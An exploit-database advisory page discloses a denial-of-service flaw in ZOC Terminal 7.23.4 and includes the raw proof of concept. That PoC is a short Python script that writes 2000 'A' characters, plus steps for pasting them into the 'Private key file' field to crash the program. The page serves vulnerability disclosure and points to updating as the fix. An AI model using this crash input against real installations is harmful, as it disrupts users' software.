ZOC Terminal v7.23.4 - 'Private key file' Denial of Service (PoC)

vendor:

ZOC Terminal

by:

Victor Mondragón

7.8

CVSS

HIGH

Denial of Service

CWE

Product Name: ZOC Terminal

Affected Version From: 7.23.4

Affected Version To: 7.23.4

Patch Exists: YES

Related CWE: N/A

CPE: a:emtec:zoc_terminal

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 Service Pack 1 x64

2019

ZOC Terminal v7.23.4 – ‘Private key file’ Denial of Service (PoC)

ZOC Terminal v7.23.4 is vulnerable to a denial of service attack when a maliciously crafted 'Private key file' is used. This can be exploited by a remote attacker to crash the application. To exploit this vulnerability, an attacker must run a python code to create a maliciously crafted 'Private key file', open the file in ZOC Terminal, select the 'Private key file' field, erase the content and paste the clipboard. Then, the attacker must click on 'Create public/private key files...' to crash the application.

Mitigation:

Update to the latest version of ZOC Terminal.

Source

Exploit-DB raw data:

#Exploit Title:  ZOC Terminal v7.23.4  - 'Private key file' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-15
#Vendor Homepage: https://www.emtec.com
#Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe
#Tested Version: 7.23.4
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: ZOC_Terminal_pkf.py
#2.- Open zoc_pkf.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files... 
#5.- Select "Private key file:" field erease and Paste ClipBoard 
#6.- Click on "Create public/private key files..."
#7.- Crashed

cod = "\x41" * 2000

f = open('zoc_pkf.txt', 'w')
f.write(cod)
f.close()